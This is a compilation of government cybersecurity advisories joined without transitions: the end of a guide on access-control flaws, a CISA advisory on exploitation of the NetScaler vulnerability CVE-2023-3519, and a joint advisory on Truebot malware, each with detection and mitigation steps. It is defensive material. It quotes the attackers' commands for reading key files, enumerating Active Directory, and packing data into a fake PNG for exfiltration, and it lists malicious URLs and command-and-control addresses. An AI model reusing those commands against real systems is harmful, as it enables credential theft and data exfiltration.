  • Verify the integrity of the product through hash or signature verification.
  • If provided, review the SBOM for outdated, vulnerable, or unauthorized applications before using the product.

    For more information, see the Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Customers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.

• Apply software patches for web applications as soon as possible.
• Configure the application to log and generate alerts from tamper attempts—with this information, network defenders can investigate and take appropriate follow-on actions.
  • Establish a baseline to efficiently identify abnormal behavior. Note: Web application error codes such as HTTP 404 and HTTP 403 are associated with common enumeration techniques.
  • Aggregate logs into a centralized solution (e.g., a security information and event management [SIEM] tool) to facilitate active monitoring and threat hunting.
• Create, maintain, and exercise a basic cyber incident response plan (IRP) and associated communications plan. Plans should include response and notification procedures for data breach and cyber incidents. For more information, see:
  • ACSC: Preparing for and Responding to Cyber Incidents
  • ACSC: Cyber Incident Response Plan – Guidance
  • ACSC: Cyber Incident Response Readiness Checklist
  • Office of the Australian Information Commissioner (OAIC): Data Breach Preparation and Response
  • OIAC: Data Breach Response Plan
  • CISA: Incident Response Plan Basics
  • CISA: Federal Government Cybersecurity Incident and Vulnerability Response Playbook (Although tailored to U.S. Federal Civilian Branch (FCEB) agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.)
  • CISA: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches

Additionally, ACSC, CISA, and NSA recommend following cybersecurity practices. For best practices, see ACSC’s Essential Eight, CISA’s CPGs, and NSA’s Top Ten Cybersecurity Mitigation Strategies.

End-User Organizations with On-Premises Software, IaaS, or Private Cloud Models

ACSC, CISA, and NSA recommend that organizations:

• Conduct regular, proactive penetration testing to ensure network boundaries, as well as web applications, are secure. Prioritize web applications that are internet-facing and contain user login functionality. Such testing may be beyond the technical or financial capabilities of some organizations. Consider using a trusted third party for penetration testing to discover new attack vectors (notably prior to deployment of new or altered internet-facing services). Note: Organizations should consult with their legal counsel as appropriate to determine which systems and applications can be included in the scope of the penetration testing.
  • Use web application penetration testing tools to capture the user identifier sent to the web server when requesting a web page containing sensitive data and map all locations where user input is used to reference objects directly. Test with users of various privilege levels (e.g., a normal user and admin user).
• Use DAST and other vulnerability scanners to detect IDOR vulnerabilities. DAST tools identify vulnerabilities in web applications with penetration tests and generate automated alerts. Note: Exercise due diligence when selecting DAST tools. Not all DAST tools can detect IDOR vulnerabilities—tools with the ability may need the environment configured in a specific way and may also need custom rules in place. Sufficient DAST tools often ingest the application API documentation to build a model of the application. While these tools can be used to detect IDOR vulnerabilities, they are not foolproof and should be used with other security testing methods to ensure comprehensive coverage.
• Immediately report detected vulnerabilities to the vendor or developer. Alternatively (or if the vendor or developer fails to respond), report the vulnerability to CISA at cisa.gov/report.
• Consider establishing a vulnerability disclosure program to verify, resolve, and report security vulnerabilities disclosed by people who may be internal or external to the organization.
• Use a web application firewall (WAF) to filter, monitor, and block malicious HTTP/S traffic traveling to the web application.
• Use a data loss prevention (DLP) tool to prevent unauthorized data from leaving the application.

ACSC, CISA, and NSA recommend that organizations with on-premises software or IaaS consider using SaaS models for their internet-facing websites.

End-User Organizations with SaaS Models

Organizations leveraging SaaS with sufficient resources may consider conducting penetration testing and using vulnerability scanners. However, such tests may interfere with service provider operations. Organizations should consult with their legal counsel as appropriate to determine what can be included in the scope of the penetration testing.

INCIDENT RESPONSE

If you or your organization are victim to a data breach or cyber incident, follow relevant cyber incident response and communications plans, as appropriate.

• Australia: Australian organizations that have been impacted or require assistance in regards to a cybersecurity incident can contact ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
• United States: U.S. organizations may report cybersecurity incidents to CISA’s 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

RESOURCES

• For additional guidance on designing secure-by-design and -default products, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
• For additional guidance on protecting against data breaches, see ACSC’s webpage on data breaches.

REFERENCES

[1] A01 Broken Access Control – OWASP Top 10:2021

[2] A massive ‘stalkerware’ leak puts the phone data of thousands at risk

[3] Mobile device monitoring services do not authenticate API requests

[4] Behind the stalkerware network spilling the private phone data of hundreds of thousands

[5] First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records

[6] Biggest Data Breaches in US History [Updated 2023]

[7] AT&T Hacker ‘Weev’ Sentenced to 3.5 Years in Prison

[8] Fuzzing | OWASP Foundation

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. ACSC, CISA, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States or Australian Governments, and this guidance shall not be used for advertising or product endorsement purposes.

PURPOSE

This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.

The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.

This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. Citrix confirmed that the actors exploited a zero-day vulnerability: CVE-2023-3519. Citrix released a patch on July 18, 2023.[1]

CVE-2023-3519

CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1]

• NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
• NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
• NetScaler ADC and NetScaler Gateway version 12.1, now end of life
• NetScaler ADC 13.1-FIPS before 13.1-37.159
• NetScaler ADC 12.1-FIPS before 12.1-65.36
• NetScaler ADC 12.1-NDcPP before 12.65.36

The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1]

CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.

Threat Actor Activity

As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid binary [T1548.001] on the ADC appliance and conducted SMB scanning on the subnet [T1046].

The actors used the webshell for AD enumeration [T1016] and to exfiltrate AD data [TA0010]. Specifically, the actors:

• Viewed NetScaler configuration files /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf [T1005]. Note: These configuration files contain an encrypted password that can be decrypted by the key stored on the ADC appliance [T1552.001].
• Viewed the NetScaler decryption keys (to decrypt the AD credential from the configuration file) [T1552.004].
• Used the decrypted AD credential to query the AD via ldapsearch. The actors queried for:
  • Users (objectClass=user) (objectcategory=person) [T1033]
  • Computers (objectClass=computer) [T1018]
  • Groups (objectClass=group) [T1069.002]
  • Subnets (objectClass=subnet)
  • Organizational Units (objectClass=organizationalUnit)
  • Contacts (objectClass=contact)
  • Partitions (objectClass=partition)
  • Trusts (objectClass=trustedDomain) [T1482]
• Used the following command to encrypt discovery data collected via openssl in “tar ball” [T1560.001]: tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz. (A “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration.)
• Exfiltrated collected data by uploading as an image file [T1036.008] to a web-accessible path [T1074]: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png.

The actors’ other discovery activities were unsuccessful due to the critical infrastructure organization’s deployment of their NetScaler ADC appliance in a segmented environment. The actors attempted to:

• Execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets.
• Verified outbound network connectivity with a ping command (ping -c 1 google.com) [T1016.001].
• Executed host commands for a subnet-wide DNS lookup.

The actors also attempted to delete their artifacts [TA0005]. The actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) [T1531]. To regain access to the ADC appliance, the organization would normally reboot into single use mode, which may have deleted artifacts from the device; however, the victim had an SSH key readily available that allowed them into the appliance without rebooting it.

The actors’ post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The actors implanted a second webshell on the victim that they later removed. This was likely a PHP shell with proxying capability. The actors likely used this to attempt proxying SMB traffic to the DC [T1090.001] (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1–Table 9 for all referenced threat actor tactics and techniques in this advisory.

DETECTION METHODS

Run the following victim-created checks on the ADC shell interface to check for signs of compromise:

1. Check for files newer than the last installation.
2. Modify the -newermt parameter with the date that corresponds to your last installation:
   • find /netscaler/ns_gui/ -type f -name *.php -newermt [YYYYMMDD] -exec ls -l {} ;
   • find /var/vpn/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
   • find /var/netscaler/logon/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
   • find /var/python/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
3. Check http error logs for abnormalities that may be from initial exploit:
   • grep '.sh' /var/log/httperror.log*
   • grep '.php' /var/log/httperror.log*
4. Check shell logs for unusual post-ex commands, for example:
   • grep '/flash/nsconfig/keys' /var/log/sh.log*
5. Look for setuid binaries dropped:
   • find /var -perm -4000 -user root -not -path "/var/nslog/*" -newermt [YYYYMMDD] -exec ls -l {} ;
6. Review network and firewall logs for subnet-wide scanning of HTTP/HTTPS/SMB (80/443/445) originating from the ADC.
7. Review DNS logs for unexpected spike in internal network computer name lookup originating from the ADC (this may indicate the threat actor resolving host post-AD enumeration of computer objects).
8. Review network/firewall logs for unexpected spikes in AD/LDAP/LDAPS traffic originating from the ADC (this may indicate AD/LDAP enumeration).
9. Review number of connections/sessions from NetScaler ADC per IP address for excessive connection attempts from a single IP (this may indicate the threat actor interacting with the webshell).
10. Pay attention to larger outbound transfers from the ADC over a short period of session time as it can be indicative of data exfiltration.
11. Review AD logs for logon activities originating from the ADC IP with the account configured for AD connection. 
12. If logon restriction is configured for the AD account, check event 4625 where the failure reason is “User not allowed to logon at this computer.”
13. Review NetScaler ADC internal logs (sh.log*, bash.log*) for traces of potential malicious activity (some example keywords for grep are provided below): 
    • database.php
    • ns_gui/vpn
    • /flash/nsconfig/keys/updated 
    • LDAPTLS_REQCERT 
    • ldapsearch 
    • openssl + salt
14. Review NetScaler ADC internal access logs (httpaccess-vpn.log*) for 200 successful access of unknown web resources.

INCIDENT RESPONSE

If compromise is detected, organizations should:

1. Quarantine or take offline potentially affected hosts.
2. Reimage compromised hosts.
3. Provision new account credentials.
4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
5. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

MITIGATIONS

CISA recommends all organizations:

• Install the relevant updated version of NetScaler ADC and NetScaler Gateway as soon as possible. See Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 for patch information.
• Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and for all services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of information technology (IT) and operational technology (OT) security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and ACSC also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
• As a longer-term effort, apply robust network-segmentation controls on NetScaler appliances, and other internet-facing devices.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Table 1–Table 9).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) are releasing this joint Cybersecurity Advisory (CSA) in response to cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.

Previous Truebot malware variants were primarily delivered by cyber threat actors via malicious phishing email attachments; however, newer versions allow cyber threat actors to also gain initial access through exploiting CVE-2022-31199—(a remote code execution vulnerability in the Netwrix Auditor application), enabling deployment of the malware at scale within the compromised environment. Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks and CVE-2022-31199 to deliver new Truebot malware variants.

The authoring organizations recommend hunting for the malicious activity using the guidance outlined in this CSA, as well as applying vendor patches to Netwrix Auditor (version 10.5—see Mitigations section below).[1] Any organization identifying indicators of compromise (IOCs) within their environment should urgently apply the incident responses and mitigation measures detailed in this CSA and report the intrusion to CISA or the FBI.

Download the PDF version of this report:

Read the associated Malware Analysis Report MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks or download the PDF version below:

For a downloadable copy of IOCs in .xml and .json format, see:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section below for cyber threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access and Execution

In recent months, open source reporting has detailed an increase in Truebot malware infections, particularly cyber threat actors using new tactics, techniques, and procedures (TTPs), and delivery methods.[2] Based on the nature of observed Truebot operations, the primary objective of a Truebot infection is to exfiltrate sensitive data from the compromised host(s) for financial gain [TA0010].

• Phishing:
  • Cyber threat actors have historically used malicious phishing emails as the primary delivery method of Truebot malware, which tricks recipients into clicking a hyperlink to execute malware. Cyber threat actors have further been observed concealing email attachments (executables) as software update notifications [T1189] that appear to be legitimate [T1204.002], [T1566.002]. Following interaction with the executable, users will be redirected to a malicious web domain where script files are then executed. Note: Truebot malware can be hidden within various, legitimate file formats that are used for malicious purposes [T1036.008].[3]
• Exploitation of CVE-2022-31199:
  • Though phishing remains a prominent delivery method, cyber threat actors have shifted tactics, exploiting, in observable manner, a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor [T1190]—software used for on-premises and cloud-based IT system auditing. Through exploitation of this CVE, cyber threat actors gain initial access, as well as the ability to move laterally within the compromised network [T1210].

Following the successful download of the malicous file, Truebot renames itself and then loads FlawedGrace onto the host. Please see the FlawedGrace section below for more information on how this remote access tool (RAT) is used in Truebot operations.

After deployment by Truebot, FlawedGrace is able to modify registry [T1112] and print spooler programs [T1547.012] that control the order that documents are loaded to a print queue. FlawedGrace manipulates these features to both escalate privilege and establish persistence.

During FlawedGrace’s execution phase, the RAT stores encrypted payloads [T1027.009] within the registry. The tool can create scheduled tasks and inject payloads into msiexec.exe and svchost.exe, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199, for example, as well as load dynamic link libraries (DLLs) [T1055.001] to accomplish privilege escalation.

Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations. Please see the Cobalt Strike section below for more information on how this remote access tool (RAT) is used in Truebot operations.

Discovery and Defense Evasion

During the first stage of Truebot’s execution process, it checks the current version of the operating system (OS) with RtlGetVersion and processor architecture using GetNativeSystemInfo [T1082].[4] Note: This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].

Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057], collect sensitive local host data [T1005], and send this data to an encoded data string described below for second-stage execution. Based on IOCs in table 1, Truebot also has the ability to discover software security protocols and system time metrics, which aids in defense evasion, as well as enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks [T1518.001][T1124].

Next, it uses a .JSONIP extension, (e.g., IgtyXEQuCEvAM.JSONIP), to create a thirteen character globally unique identifier (GUID)—a 128-bit text string that Truebot uses to label and organize the data it collects [T1036].

After creating the GUID, Truebot compiles and enumerates running process data into either a base64 or unique hexadecimal encoded string [T1027.001]. Truebot’s main goal is identifying the presence of security debugger tools. However, the presence of identified debugger tools does not change Truebot’s execution process—the data is compiled into a base64 encoded string for tracking and defense evasion purposes [T1082][T1622].

Data Collection and Exfiltration

Following Truebot’s enumeration of running processes and tools, the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request (as observed in the user-agent string). Note: A user-agent string is a customized HTTP request that includes specific device information required for interaction with web content. In this instance, cyber threat actors can redirect victims to malicious domains and further establish a C2 connection.

The POST request functions as means for establishing a C2 connection for bi-lateral communication. With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004]. Truebot malware has the capability to download additional malicious modules [T1105], load shell code [T1620], and deploy various tools to stealthily navigate an infected network.

Associated Delivery Vectors and Tools

Truebot has been observed in association with the following delivery vectors and tools:

Raspberry Robin (Malware)

Raspberry Robin is a wormable malware with links to other malware families and various infection methods, including installation via USB drive [T1091].[5] Raspberry Robin has evolved into one of the largest malware distribution platforms and has been observed deploying Truebot, as well as other post-compromise payloads such as IcedID and Bumblebee malware.[6] With the recent shift in Truebot delivery methods from malicious emails to the exploitation of CVE-2022-31199, a large number of Raspberry Robin infections have leveraged this exploitable CVE.[2]

Flawed Grace (Malware)

FlawedGrace is a remote access tool (RAT) that can receive incoming commands [T1059] from a C2 server sent over a custom binary protocol [T1095] using port 443 to deploy additional tools [T1105].[7] Truebot malware has been observed leveraging (and dropping) FlawedGrace via phishing campaigns as an additional payload [T1566.002].[8] Note: FlawedGrace is typically deployed minutes after Truebot malware is executed.

Cobalt Strike (Tool)

Cobalt Strike is a popular remote access tool (RAT) that cyber threat actors have leveraged—in an observable manner—for a variety of post-exploitation means. Typically a few hours after Truebot’s execution phase, cyber threat actors have been observed deploying additional payloads containing Cobalt Strike beacons for persistence and data exfiltration purposes [T1059].[2] Cyber threat actors use Cobalt Strike to move laterally via remote service session hijacking [T1563.001][T1563.002], collecting valid credentials through LSASS memory credential dumping, or creating local admin accounts to achieve pass the hash alternate authentication [T1003.001][T1550.002].

Teleport (Tool)

Cyber threat actors have been observed using a custom data exfiltration tool, which Talos has named “Teleport.”[2] Teleport is known to evade detection during data exfiltration by using an encryption key hardcoded in the binary and a custom communication protocol [T1095] that encrypts data using advanced encryption standard (AES) and a hardcoded key [T1048][T1573.002]. Furthermore, to maintain its stealth, Teleport limits the data it collects and syncs with outbound organizational data/network traffic [T1029][T1030].

Truebot Malware Indicators of Compromise (IOCs)

Truebot IOCs from May 31, 2023, contain IOCs from cyber threat actors conducting Truebot malspam campaigns. Information is derived from a trusted third party, they observed cyber threat actors from 193.3.19[.]173 (Russia) using a compromised local account to conduct phishing campaigns on May 23, 2023 and spread malware through: https[:]//snowboardspecs[.]com/nae9v, which then promptly redirects the user to: https://www.meditimespharma[.]com/gfghthq/, which a trusted third party has linked to other trending Truebot activity.

After redirecting to https://www.meditimespharma[.]com/gfghthq/, trusted third parties have observed, the cyber threat actors using Truebot to pivot to https://corporacionhardsoft[.]com/images/2/Document_16654.exe, which is a domain associated with snowboardspecs[.]com, as well as malicious phishing campaigns in May 2023 and flagged my numerous security vendors, according to trusted third party reporting. Note: these IOCs are associated with Truebot campaigns used by Graceful Spider to deliver FlawedGrace and LummaStealer payloads in May of 2023.

The malicious file MD5 hash, 6164e9d297d29aa8682971259da06848 is associated with multiple Truebot rooted attack vectors and malware families, and was downloaded from https://corporacionhardsoft.com/images/2/Document_16654[.]exe which was flagged as malicious by numerous security vendors, and during its execution, the malware copies itself to C:IntelRuntimeBroker.exe, and based on trusted third party analysis, is linked to https://essadonio.com/538332[.]php, which is linked to 45.182.189[.]71 (Panama) and is associated with other trending Truebot malware campaigns from May 2023.

Please reference table 1 for IOCs described in the paragraph above.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-16 for all referenced cyber threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

DETECTION METHODS

CISA and authoring organizations recommend that organizations review and implement the following detection signatures, along with: Win/malicious_confidence100% (W), Trojan:Win32/Tnega!MSR, and Trojan.Agent.Truebot.Gen, as well as YARA rules below to help detect Truebot malware.

Detection Signatures

YARA Rules

CISA developed the following YARA to aid in detecting the presence of Truebot Malware.

• Additional YARA rules for detecting Truebot malware can be referenced from GitHub.[9]

INCIDENT RESPONSE

The following steps are recommended if organizations detect a Truebot malware infection and compromise:

1. Quarantine or take offline potentially affected hosts.
2. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
3. Provision new account credentials.
4. Reimage compromised host.
5. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or contact your local FBI field office. State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).

MITIGATIONS

CISA and the authoring organizations recommend organizations implement the below mitigations, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services.

For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and co-sealers recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

• Apply patches to CVE-2022-31199
• Update Netwrix Auditor to version 10.5

Reduce threat of malicious actors using remote access tools by:

• Implementing application controls to manage and control execution of software, including allowlisting remote access programs.
  • Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.

See the National Security Agency’s Cybersecurity Information sheet, Enforce Signed Software Execution Policies, and additional guidance below:

• Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Audit the network for systems using RDP.
  • Close unused RDP ports.
  • Enforce account lockouts after a specified number of attempts.
  • Apply phishing-resistant multifactor authentication (MFA).
  • Log RDP login attempts.
• Disable command-line and scripting activities and permissions [CPG 2.N].
• Restrict the use of PowerShell by using Group Policy, and only grant to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
• Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
• Enable enhanced PowerShell logging [CPG 2.T, 2.U].
  • PowerShell logs contain valuable data, including historical OS and registry interaction and possible IOCs of a cyber threat actor’s PowerShell use.
  • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
  • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. The authoring organizations recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
• Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
• Reduce the threat of credential compromise via the following:
  • Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
  • Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
  • Refrain from storing plaintext credentials in scripts.
• Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory (AD) level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.

In addition, CISA, FBI, MS-ISAC, and CCCS recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
• Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they can retrieve their data [CPG 2.R]. 
• Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.
  • Use longer passwords consisting of at least 15 characters [CPG 2.B].
  • Store passwords in hashed format using industry-recognized password managers.
  • Add password user “salts” to shared login credentials.
  • Avoid reusing passwords [CPG 2.C].
  • Implement multiple failed login attempt account lockouts [CPG 2.G].
  • Disable password “hints.”
  • Refrain from requiring password changes more frequently than once per year.
    Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
  • Require administrator credentials to install software.
• Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
• Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to various subnetworks, restricting further lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Disable unused ports [CPG 2.V].
• Consider adding an email banner to emails received from outside your organization [CPG 2.M].
• Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 5-13).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

• NIST: NVD – CVE-2022-31199
• Stopransomware.gov (A whole-of-government approach with one central location for U.S. ransomware resources and alerts.)
• #StopRansomware Guide
• CISA: Implement Phishing-Resistant MFA
• CISA: Guide to Securing Remote Access Software
• CISA and MS-ISAC: Joint Ransomware Guide
